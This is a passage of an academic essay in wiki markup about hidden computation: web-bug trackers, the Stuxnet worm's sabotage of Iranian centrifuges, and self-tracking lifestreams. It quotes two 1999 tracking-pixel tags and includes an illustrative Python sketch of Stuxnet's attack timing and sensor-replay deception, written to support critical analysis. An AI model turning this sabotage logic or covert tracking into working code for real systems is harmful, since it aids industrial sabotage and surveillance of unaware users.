Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; code which, should it be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique that reduces the readability of code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again, Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users' desire &amp;quot;not to be tracked&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second-guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen from the relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) generates $189 per user, a unique visitor to [http://www.businessinsider.com/blackboard/google Google] (search) generates $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Advertiser: A company sponsoring advertisements and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;T] &lt;br /&gt;
*b. Exchange: A provider of a marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media] &lt;br /&gt;
*c. Network: A broker, and often technology provider, connecting advertisers and publishers (website operators). Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d. Publisher: A website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
2. '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Online Data Aggregator: Collects data from online publishers and provides it to advertisers, either directly or via an exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b. Offline Data Aggregator: Collects data from a range of offline sources and provides it to advertisers, directly or via an exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c. Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d. Research: Collects data for market research purposes, where no ads are served through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e. Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f. Retargeter: Provider of technologies that allow publishers to identify their visitors when they place ads on third-party sites. Example: [http://www.fetchback.com/ Fetchback]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
3. '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a. Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b. Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges. SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c. Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d. Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
4. '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a. Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b. Online Privacy: Technology providers that deliver information and transparency to consumers on how third-party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&lt;br /&gt;
&lt;br /&gt;
[[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2010)'' &lt;br /&gt;
&lt;br /&gt;
Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &lt;/blockquote&gt; &lt;br /&gt;
Of course, one element missing from this typology is surveillance, and indeed it is no surprise that web bugs form part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto, and later confirmed in testimony to a U.S. House of Representatives subcommittee that it is ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis, or even warnings, to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation, and keeps itself very much to itself in order to avoid attracting unwarranted attention. Some of the current discussion of the direction of regulation on this issue has focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header, and there is currently no legal requirement that they do so, in the US or elsewhere (W3C, 2012). One can also see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). &lt;br /&gt;
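The mechanism at stake here is disarmingly simple, which is partly why everything turns on voluntary compliance. A sketch of what honouring the header would involve, assuming a hypothetical request handler: &lt;br /&gt;
&lt;pre&gt;
# Sketch of honouring the 'do not track' flag, which arrives as the HTTP
# header 'DNT: 1'. Hypothetical handler: nothing obliges a tracker to
# consult this value, which is precisely the regulatory problem.
def handle_request(headers):
    if headers.get('DNT') == '1':
        # A compliant tracker would skip logging, cookie-setting,
        # profiling and onward sale of the data.
        return {'track': False}
    return {'track': True}

print(handle_request({'DNT': '1'}))   # {'track': False}
print(handle_request({}))             # {'track': True}
&lt;/pre&gt;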
&lt;br /&gt;
One of the newer, and perhaps indicative, directions of travel for these web bugs is [http://www.persianstat.ir/ PersianStat], an Iranian web tracking and data analytics service which claims to keep 'an eye on 1091622 websites'; it demonstrates that this new code ecology is not a purely Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking system will only become more invasive and aggressive in collecting data from our everyday lives and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growing use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;that 73 percent of Americans said they would 'not be okay' with being tracked (because it would be an invasion of privacy)… Only 23 percent said they'd be 'okay' with tracking (because it would lead to better and more personalized search results)… Despite all those high-percentage objections to the idea of being tracked, less than half of the people surveyed -- 38 percent -- said they knew of ways to control the data collected about them. (Garber, 2012; Pew, 2012) &lt;/blockquote&gt; &lt;br /&gt;
This contradiction, between the ability of these computational systems and surfaces to supply a commodity to the user and the need to raise income by harvesting data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent to which users are simply not aware of the subterranean depths of their computational devices, and of the ability of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the user the impression that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). This issue is helpfully illustrated by the next case study, the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
This next example is a computer worm called Stuxnet,[6] which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and then activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name ‘Stuxnet’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’: the first part, 'stu', comes from the (.stub) file, mrxcls.sys, and the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to mark a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, such as a test facility to model a nuclear plant, to create and launch (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained, &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b) &lt;/blockquote&gt; &lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection, covering its tracks by recording data from the nuclear processing system and playing it back to the operators to disguise the fact that it is gently causing the centrifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals, so that an infected system does not exhibit abnormal behaviour and therefore does not raise an alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotage, and in a targeted way, through the fatiguing of the motors – this looks like standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010). A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Associated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&lt;blockquote&gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is “very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically,”… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&lt;/blockquote&gt; &lt;br /&gt;
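The logic Zetter describes is, in effect, a timed state machine that alternates long dormant periods with short sabotage routines. The following schematic sketch reconstructs that sequencing from her published description; it is illustrative only and is emphatically not the actual Stuxnet code, which ran as injected logic on the Siemens controllers themselves: &lt;br /&gt;
&lt;pre&gt;
# Schematic reconstruction of Stuxnet's attack sequencing, after Zetter
# (2011). Illustrative only; not the actual PLC attack code.
NOMINAL_HZ = 1064

def attack_sequences():
    # Alternate indefinitely between the two attack routines, with a
    # 27-day dormant period before each one.
    while True:
        # Overspeed: drive rotors towards their mechanical limit, then
        # restore the nominal frequency within about 15 minutes.
        yield (27, 1410, 15)
        # Slowdown: reduce the frequency to near standstill for about
        # 50 minutes, then restore it again.
        yield (27, 2, 50)

seq = attack_sequences()
for _ in range(4):
    wait_days, hz, minutes = next(seq)
    print(f'wait {wait_days} days; run centrifuges at {hz} Hz for '
          f'{minutes} min; restore {NOMINAL_HZ} Hz and replay recorded '
          f'sensor data to the operators')
&lt;/pre&gt;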
Stuxnet disguises all of this activity by overriding the data control systems, sending commands to disable the warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is interesting because it is not a general-purpose attack: it is designed to unload its digital warheads only under specific conditions, against a specific target. It is also remarkable in the way it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it, given the complexities involved in testing such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexity and structure of the worm suggest that at least thirty people would have had to work on it simultaneously (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, one using techniques that are neither public nor known to the developer of the attacked system, in this case Microsoft and Siemens. In actuality, Stuxnet was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach of its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) systems and PLCs (Programmable Logic Controllers), this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
Stuxnet has two chief capabilities: (1) to identify its target precisely, using a number of software-based markers that give away the physical identity of the location. Indeed, the ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) to disengage control systems from physical systems and insert a stealth infection into the computer system that would fool the operators of the plant (the ‘man-in-the-middle attack’ described above). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller (315) was designed to slowly reduce the speed of the rotors, leading to cracks and failures, while the larger (417) manipulated valves in the centrifuge and faked industrial process control sensor signals by modelling the centrifuges, which were grouped into cascades of 164 (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards,[8] &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a) &lt;/blockquote&gt; &lt;br /&gt;
The hypotheses about Stuxnet's origin are drawn from an analysis of the approximately 15,000 lines of programming code. This involved a close reading and reconstruction of the programming logic: taking the machine code, disassembling it, and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers and data structures, in order to try to understand what it was doing (Langner, 2011). Indeed, as part of this process a reference to “Myrtus” was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel was involved in the creation of such a sophisticated attack virus. The attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see Table 1). &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran - 52.2% &lt;br /&gt;
**Indonesia - 17.4% &lt;br /&gt;
**India - 11.3% &lt;br /&gt;
**Pakistan - 3.6% &lt;br /&gt;
**Uzbekistan - 2.6% &lt;br /&gt;
**Russia - 2.1% &lt;br /&gt;
**Kazakhstan - 1.3% &lt;br /&gt;
**Rest of World - 9.4% &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Clearly, this kind of attack could be mobilised against targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. Of course, once the code for undertaking this kind of sophisticated cyberattack is out in the wild, it is relatively trivial to decode it and so learn, in a very short time, techniques that would otherwise have taken many years of development. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit one whose purpose is linked to the collection of data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports, &lt;br /&gt;
&lt;br /&gt;
&lt;blockquote&gt;There were a number of projects involving programs based on the “Tilded” [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012) &lt;/blockquote&gt; &lt;br /&gt;
The increasing ability of software and code, running on computational devices, to covertly monitor, control and mediate, both positively and negatively, is not just a matter of interventions that deceive the human and non-human actors who make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems, as part of the notion of lifestreams and, more particularly, the quantified-self movement. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web bugs and worms with the growth in the use of self-monitoring technologies, called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as ‘real-time stream’ platforms, like Twitter and Facebook, have grown. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', which argues that the, &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;blockquote&gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as “self-tracking”, “body hacking” or “self-quantifying”. (2012) &lt;/blockquote&gt; &lt;br /&gt;
This phenomenon of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. It closes the loop of personal information online which, although it remains notionally private, is stored and accessed by corporations that wish to use this biodata for data mining and innovation surfacing. For example: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;blockquote&gt;The Zeo [headband], for example, has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012) &lt;/blockquote&gt; &lt;br /&gt;
Lifestreams were originally an idea developed by David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;blockquote&gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents --- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and &amp;quot;compress&amp;quot; large numbers of documents into overviews or executive summaries. (Freeman, 2000) &lt;/blockquote&gt; &lt;br /&gt;
Gelernter originally called these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions in relation to the storage of documentation and texts. Today we are more likely to think of them as the ‘real-time streams’ and timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also micro-streams of short updates, epitomised by Twitter's text-message-sized, 140-character updates. Nonetheless, this is still enough text space to incorporate a surprising amount of data, particularly when geodata, images, weblinks and so forth are factored in. Stephen Wolfram was one of the first people to collect his own data systematically, starting in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that. Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &lt;br /&gt;
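Freeman's description translates almost directly into a data structure: a time-ordered, append-only sequence of documents over which filtered ‘substreams’ and summaries are defined. A minimal sketch of that idea (hypothetical, not the Yale Lifestreams implementation): &lt;br /&gt;
&lt;pre&gt;
# Minimal sketch of a lifestream as a time-ordered document stream, after
# Freeman (2000). Hypothetical; not the Yale Lifestreams implementation.
from dataclasses import dataclass, field
from datetime import datetime

@dataclass
class Document:
    timestamp: datetime
    kind: str        # 'mail', 'photo', 'bill', 'reminder', ...
    content: str

@dataclass
class Lifestream:
    documents: list = field(default_factory=list)

    def store(self, doc):
        # Documents are simply appended; time order is the only index.
        self.documents.append(doc)
        self.documents.sort(key=lambda d: d.timestamp)

    def substream(self, kind):
        # 'Organize information on demand': a filtered view, not a folder.
        return [d for d in self.documents if d.kind == kind]

    def future(self, now):
        # Documents beyond the present act as reminders and to-do items.
        return [d for d in self.documents if d.timestamp &gt; now]
&lt;/pre&gt;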
&lt;br /&gt;
This kind of self-collection of data is certainly becoming more prevalent and, in the context of reflexivity and self-knowledge, it raises interesting questions. The data collected can also be relatively large in scale and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt prove revealing about our everyday patterns in the future.[12] &lt;br /&gt;
&lt;br /&gt;
Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also to search other timelines, view profiles and streams, and so on. Created as apps, however, they are also able to use the power of the local device, especially the sophisticated sensory circuitry that is common in smartphones, to log GPS location, direction, and so forth. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard that is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed (a minimal example follows the definition below): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- &amp;quot;Geraldine posted a photo to her album&amp;quot; or &amp;quot;John shared a video&amp;quot;. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis) &lt;br /&gt;
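Concretely, the JSON serialisation of such an activity looks roughly as follows; this is a hand-written illustration modelled on the examples in the specification, not code copied from it: &lt;br /&gt;
&lt;pre&gt;
# A hand-written illustration of a JSON Activity Streams 1.0 activity
# ('Geraldine posted a photo to her album'), after ActivityStreamsWG (2011).
import json

activity = {
    'published': '2012-03-04T15:04:55Z',
    'actor':  {'objectType': 'person',
               'displayName': 'Geraldine'},
    'verb':   'post',
    'object': {'objectType': 'photo',
               'url': 'http://example.org/photos/1'},
    'target': {'objectType': 'photo-album',
               'displayName': "Geraldine's Photo Album"},
}

# Encoded for transmission, the activity can later be aggregated,
# searched and processed alongside millions of others.
print(json.dumps(activity, indent=2))
&lt;/pre&gt;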
&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualised, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and the aggregative use case, in other words for the individual user (or lifestreamer) as much as for the organisation (such as Facebook), the key is to pattern-match and compare details of the data, such as against a norm, a historical data set, or a population, group or class of others.[13] &lt;br /&gt;
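As a toy illustration of this comparison against a norm, consider flagging the days in a week of (hypothetical) step-count data that deviate sharply from the personal baseline: &lt;br /&gt;
&lt;pre&gt;
# Toy illustration of pattern-matching self-tracked data against a norm:
# flag days whose step counts deviate sharply from the personal baseline.
# Hypothetical numbers; standard library only.
from statistics import mean, stdev

steps = [8200, 7900, 8400, 8100, 2100, 8300, 15900]   # one week of data
baseline, spread = mean(steps), stdev(steps)

for day, count in enumerate(steps, start=1):
    if abs(count - baseline) &gt; 1.5 * spread:
        print(f'day {day}: {count} steps deviates from '
              f'baseline {baseline:.0f}')
&lt;/pre&gt;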
&lt;br /&gt;
